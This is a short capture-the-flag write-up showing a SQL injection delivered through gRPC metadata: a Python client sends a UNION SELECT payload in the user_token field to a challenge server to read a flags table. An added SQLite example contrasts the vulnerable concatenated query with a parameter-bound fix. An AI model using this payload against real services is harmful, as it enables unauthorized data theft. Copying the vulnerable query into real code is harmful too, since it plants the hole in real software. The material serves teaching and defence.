SQL Injection over gRPC:

```
import grpc
import main_pb2
import main_pb2_grpc

CON_STR = 'light.w-jp.cf:1004'

# The injection payload is sent as the user_token metadata entry,
# not in the request message itself.
with grpc.insecure_channel(CON_STR) as channel:
    stub = main_pb2_grpc.SrvStub(channel)
    res = stub.GetLoginHistory(main_pb2.SrvRequest(), metadata=(('user_token', "')) UNION SELECT flag FROM flags-- "),))
    print(res.ip)
```

which results in the following SQL query being executed:

```
SELECT ul.ip FROM `user_logs` AS `ul` WHERE (ul.user_id = (SELECT id FROM users AS u WHERE u.token = '')) UNION SELECT flag FROM flags-- '))
```
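The root cause behind the query above, shown next to its fix, as an added example that is not from the original writeup or the challenge's server code. It assumes the server builds the query by string concatenation; the SQLite in-memory database, the rows and the function names are constructed for illustration.

```python
import sqlite3

# Payload taken from the writeup's user_token metadata value.
PAYLOAD = "')) UNION SELECT flag FROM flags-- "

def make_db():
    """Constructed in-memory data reusing the table names from the query."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, token TEXT);
        CREATE TABLE user_logs (user_id INTEGER, ip TEXT);
        CREATE TABLE flags (flag TEXT);
        INSERT INTO users VALUES (1, 'tok-alice');
        INSERT INTO user_logs VALUES (1, '203.0.113.7');
        INSERT INTO flags VALUES ('flag{constructed-sample}');
    """)
    return db

def login_history_vulnerable(db, user_token):
    # Assumed server behaviour: the metadata value is pasted into the SQL
    # text, so a quote in the token ends the literal and the rest is SQL.
    sql = ("SELECT ul.ip FROM `user_logs` AS `ul` WHERE (ul.user_id = "
           "(SELECT id FROM users AS u WHERE u.token = '" + user_token + "'))")
    return [row[0] for row in db.execute(sql)]

def login_history_safe(db, user_token):
    # Hardened form: the token is a bound parameter, only compared as data.
    sql = ("SELECT ul.ip FROM `user_logs` AS `ul` WHERE (ul.user_id = "
           "(SELECT id FROM users AS u WHERE u.token = ?))")
    return [row[0] for row in db.execute(sql, (user_token,))]

if __name__ == "__main__":
    db = make_db()
    print(login_history_vulnerable(db, PAYLOAD))   # rows from the flags table
    print(login_history_safe(db, PAYLOAD))         # no matching token
    print(login_history_safe(db, "tok-alice"))     # normal lookup still works
```

gRPC metadata is client-controlled input like any header or form field, so it needs the same parameter binding as values carried in the request message.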

Original writeup (https://blog.justins.in/wectf-2020#lightsequel).